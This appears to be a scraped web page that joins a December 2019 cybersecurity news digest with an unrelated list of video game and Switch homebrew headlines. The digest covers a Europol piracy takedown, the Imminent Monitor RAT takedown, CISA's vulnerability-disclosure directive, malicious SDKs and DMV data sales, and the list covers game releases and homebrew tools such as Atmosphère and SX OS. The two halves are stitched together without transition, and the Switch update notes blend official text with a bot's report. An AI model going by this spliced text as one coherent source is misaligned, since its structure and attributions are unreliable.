Piracy Sites Shutdown. Europol, working with law enforcement teams from 18 countries, has shut down more than 30,000 Internet domain names for trafficking in pirated digital content and counterfeit products and pharmaceuticals. Officials have also seized physical property, frozen at least €150,000 (the US $165,000) in several bank accounts, and arrested three individuals in connection with the investigation.
Read more in:
- 30,506 Internet Domain Names Shut Down For Intellectual Property Infringement
- Over 30,500 Online Piracy Sites Shut Down in Global Operation
- Europol wipes out 30,000+ piracy sites, three suspects cuffed to walk the legal plank
Imminent Monitor RAT Operation Shut Down. Law enforcement officials from multiple countries cooperated to take down the infrastructure supporting a malware operation known as Imminent Monitor, a remote access Trojan (RAT) that has been sold online since 2013. The investigation was led by the Australian Federal Police and aided by authorities in Belgium, New Zealand, the UK, the US, and other countries.
Note: Well done to all involved in this takedown. A timely reminder that international cooperation is key to tackling the scourge of online crime. It is also a good time to highlight again the No More Ransom website supported by Europol which distributes the known decryption keys for ransomware strains. You can access it for free at www.nomoreransom.org
Read more in:
- The Rat Trap: international cybercrime investigation shuts down insidious malware operation
- International Crackdown On Rat Spyware Which Takes Total Control of Victims’ PCs
- Authorities take down ‘Imminent Monitor’ RAT malware operation
- Authorities Break Up Imminent Monitor Spyware Organization
- Law Enforcement Shuts Down Imminent Monitor Malware, Makes Arrests
- Law enforcement delivers knockout blow to Imminent Monitor RAT network
CISA Wants US Government Agencies to Establish Vulnerability Disclosure Programs. The US Department of Homeland Security’s (DHS’s) Cybersecurity and Infrastructure Security Agency (CISA) has issued a draft binding operational directive (B20-01) that would require civilian agencies to establish vulnerability disclosure programs, as well as a plan for managing security issues that are reported. CISA is accepting comments on the draft document through December 27, 2019.
- Large technology companies in private industry went through this over a decade ago, and the results were overwhelmingly positive. It would be good to see CISA provide a strawman vulnerability disclosure policy as a starting point for all the departments and agencies.
- The guidance on the BOD 20-01 web site includes all the aspects needed as well as timelines; providing a sample policy would help agencies meet the deliverables, as well as avoiding “wrong-rock” iterations. The directive includes additional FISMA reporting requirements associated with the disclosure program starting in FY21. While well-intended, not every agency has the resources or process maturity to meet the tracking, verification, response and reporting requirements.
Read more in:
- Improving Vulnerability Disclosure Together (blog)
- Binding Operational Directive 20-01 | November 27, 2019 (draft) | Develop and Publish a Vulnerability Disclosure Policy
- DHS to Require Federal Agencies to Set Vulnerability Disclosure Policies
- CISA Pushing U.S. Agencies to Adopt Vulnerability Disclosure Policies
- DHS issues draft order to require vulnerability disclosure policies at civilian agencies
Facebook and Twitter Warn of Malicious SDKs. Twitter and Facebook have warned of certain malicious software development kits (SDKs) that could be used to steal users’ personal information. The SDKs in question are maintained by MobiBurn and oneAudience.
Note: These SDKs are being leveraged by data aggregators and have been seen on Android vs iOS. Use caution with granting excess permissions on Android applications.
Read more in:
- Facebook, Twitter ban malicious SDK that removed member info
- Two third-party SDKs allowed secret harvesting of Twitter and Facebook user data
- SDKs Misused to Scrape Twitter, Facebook Account Info
- Keeping your account safe from malicious activity
California DMV Makes Millions Selling Drivers’ Personally Identifiable Information. According to documents obtained through a public records act request, the California Department of Motor Vehicles (DMV) has been making millions of dollars a year selling drivers’ personal information. Customers paying for the information include data brokers, credit reporting agencies, and private investigators. The data include names, addresses, and car registration information, all of which drivers must provide to get a license. The practice of DMVs selling driver data is not unique to California.
Note: No, it is not unique to California but is usually governed by law. Where it is not, it is because the legislature chooses to look the other way.
The headline on 20 December 2019
Warner Bros. UK releases the LEGO® Star Wars: The Skywalker Saga Sizzle from TT Games arrives in 2020.
LEGO Builder’s Journey, available now exclusively on Apple Arcade.
The headline on 19 December 2019
Modus Games and Stormind Games shared a new look at the Ashmann Inn, the ominous home away from home guests will settle into when Remothered: Broken Porcelain releases on PlayStation 4, Nintendo Switch, PC and Xbox One in 2020.
Team17 and Moi Rai Games launched free update to Monster Sanctuary which includes a community-designed monster and online player-versus-player combat.
The headline on 18 December 2019
Metro VR Studios (MVRS) announces it’s ready to deliver Orion13, scheduled for release in Feb. 2020 and will be available for the HTC and Oculus headsets.
The headline on 16 December 2019
Team17 has announced a new partnership with Bad Yolk Games to support the development of Main Assembly.
Dispatch Games announced that Japanese Rail Sim: Journey to Kyoto is scheduled to release in spring of 2020 on Nintendo SwitchTM- It will be available in both digital and packaged form for the North American market.
NX-Activity-Log Version 1.1 Release: Now it can override User Page and view recent play activity. Source: GitHub > NX-Activity-Log
All 153 ImmortalFaith Guides updated to 7.23d patch. Source: Steam > ImmortalFaith
Ghost of Tsushima box art, releasing Summer 2020.
The headline on 13 December 2019
Röki demo available for 48 hours from 6 pm GMT/10 am PT on Steam’s dedicated page.
Angry Birds VR: Isle of Pigs update released today by Resolution Games for Rovio Entertainment’s (ROVIO) feathered friends, players can now – for the first time in any Angry Birds game – design and play their very own levels.
Team17, SMG Studio, and DevM Games have announced that the Moving Out will launch in Q2 2020 on Nintendo Switch, PC (Steam), PlayStation 4 and Xbox One. A demo of Moving Out will be available on Steam for a limited 48 hour to play from 6 pm GMT today until 6 pm GMT Saturday 14th December, features four levels of 1-4 player, couch-co-op, madcap mayhem that gives players the chance to experience some of what the full game has in store next year.
The headline on 12 December 2019
Atmosphere 0.10.1 released, bundled with hbl 2.3, and hbmenu 3.2.0. Source: GitHub > Atmosphère 0.10.1
JaffaJam releasing Slam Dunk Santa, utilizing its framework BubbleGum, a development toolset for the Unity platform.
SOEDESCO and Tropical Puppy publish Fantasy Farming: Orange Season, available for Early Access on Steam with a 94% ‘very positive’ rating out of 110 total ratings.
The headline on 11 December 2019
Capcom unveiling a completely reimagined Resident Evil 3. Resident Evil 3 will be available on PlayStation4, Xbox One and Steam on April 3, 2020.
MechWarrior 5: Mercenaries from Piranha Games is now available for download on the Epic Games Store ($49.99 standard, $59.99 collectors edition.)
The headline on 10 December 2019
Vertex Pop announced that Super Crush KO is coming to the eShop for Nintendo Switch and Steam on January 16th, 2020.
Gameforge introduces Act 7: The Orcs and the Celestial Spire, the biggest update for NosTale with new maps, monsters, and quests, as well as an enhanced game experience in the fantastic world, enriched with extensive features.
Gunlord X from developer NGDEV will be available digitally for PS4 on December 10th in North America and December 11th in Europe for US$9.99 and €9.99.
Portal Games announce the second expansion for Empires of the North: Roman Banners to be published in 1Q 2020, includes two brand new Roman decks and additional island cards. Source: Portal Games announces brand new expansion to Empires of the North: Roman Banners
Checkpoint 3.7.4 released with Atmosphere 0.10.0 compatibility and QoL fixes. Source: GitHub > Checkpoint 3.7.4
Bounty Rune Update which locked to 5-minute intervals in terms of their gold values (so getting a 6-minute bounty isn’t higher than a 5 minute one). Source: Steam > DOTA 2 UPDATE – DECEMBER 9TH 2019
New BioShock Announced, Being Developed by New Developer Cloud Chamber, but don’t expect this new game shortly. Source: IGN > New BioShock Game Announced, Being Developed by New 2K Studio Cloud Chamber
The headline on 9 December 2019
SX OS v2.9.3. Beta updated to support FW 9.1.0 and game titles that use newer encryption, available on the SX OS download page and as an OTA update using the SX OS builtin updater. Source: Team Xecuter > SX OS v2.9.3. Beta Announcement
Atmosphère 0.10.0 released which bundled with hbl 2.2, and hbmenu 3.1.1. Source: GitHub > Atmosphère 0.10.0
The headline on 7 December 2019
Warsaw, Poland | Space Pioneer released now on Nintendo Switch for 10 USD / 10 EUROS.
Skybound Games and Sheffield announced that Gang Beasts is now available in PlayStation4 and Xbox One at retail locations across North America on the 3rd December and all other territories on the 6th December for $29.99 / €24.99/ £19.99.
The headline on 5 December 2019
Goat of Duty is going free on Steam for one weekend only starts from today 6 pm GMT/7 pm CET/1 pm ET/10 am PT until the end of Sunday 8th.
Private Division and Squad announced that Kerbal Space Program Enhanced Edition: Breaking Ground Expansion is now available for PlayStation 4 and Xbox One, focused on increasing the objective possibilities once celestial bodies have been reached by adding more interesting scientific endeavors and expanding the toolset.
System Update version 9.1.0 for Switch released on December 4, 2019. General system stability improvements to enhance the user’s experience, including a solution for the following:
- Resolved an issue where the color animation was not displaying correctly when attaching a Joy-Con controller to the Nintendo Switch console.
- The titles’ .*info files are now available (title descriptions were also updated if needed/successful), see the report title-listing.
- Started sysmodule SwIPC-generation task. The output will be available with the above .info files via the report title-listing page, this will take a while to finish for all sysmodules.
- Security flaws fixed.
Sysupdate detected for Switch: https://t.co/S8l98B5ro1
— ylws8bot (@ylws8bot) December 5, 2019
The headline on 3 December 2019
Rebellion has brought three classic titles to Steam for the first time. The trio of golden oldies are Free Running, World War Zero, Gunlok, and all three games are available at a special 15% launch week discount.
Skybound Games and Beamdog announced that the physical and digital enhanced edition of Neverwinter Nights can be purchased at major retailers globally for £39.00/€49.99/$49.99 on the PlayStation4, Xbox One, and Nintendo Switch.
The headline on 2 December 2019
uLaunch 0.2 released, with Quick Menu, Settings, controller menu applet, and uViewer. Source: GitHub > XorTroll/uLaunch
Reality Clash offers tokenized in-game weapons in the world’s first blockchain-based digital gaming vending machine. Reality Gaming Group has joined forces with Silica neXus to provide arcade gamers with in-game tokenized assets via the world’s first blockchain-based vending machines which will be available across family entertainment centers, arcades and theme parks globally in the US.
Farming Simulator 20 released on Nintendo Switch and for Android and iOS devices, features over 100 faithfully reproduced farming vehicles and tools from a wide range of industry-leading manufacturers.
Weakless is coming to Xbox One on December 13th. Weakless PC release is coming in the first quarter of 2020.
The latest update of Kitty Powers’ Matchmaker is now available in French, Italian, and German. Kitty Powers’ Matchmaker is available on Steam, Xbox One, Playstation 4, Android and Apple devices.
LABS Works announced that Castle in the Darkness 2 is now in development, offers a similar brand of high-speed, action-RPG exploration to the first game.
Good Luck 3, Inc. initiated a Crowdfunding campaign through “FUNDINNO” on November 27, 2019, the project received 10,000,000 JPY (USD 100,000) within 3 minutes after going live. The fund will be used towards further growth of existing projects, including Japan’s first blockchain game, Crypt-Oink, and blockchain content platform RAKUN.
Slitherine LTD in collaboration with Sony Pictures Consumer Products announced “Starship Troopers – Terran Command,” a real-time strategy game based on TriStar Pictures’ iconic 1997 movie to be released for PC in 2020.